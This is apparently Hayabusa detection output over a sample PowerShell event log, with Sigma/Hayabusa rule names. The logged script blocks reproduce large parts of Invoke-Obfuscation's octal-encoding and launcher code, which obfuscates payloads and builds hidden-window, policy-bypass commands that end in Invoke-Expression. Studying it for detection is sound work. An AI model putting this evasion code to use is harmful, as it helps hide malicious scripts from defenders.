$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. 
# Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. 
$InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.262 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. 
$DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. 
$RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + 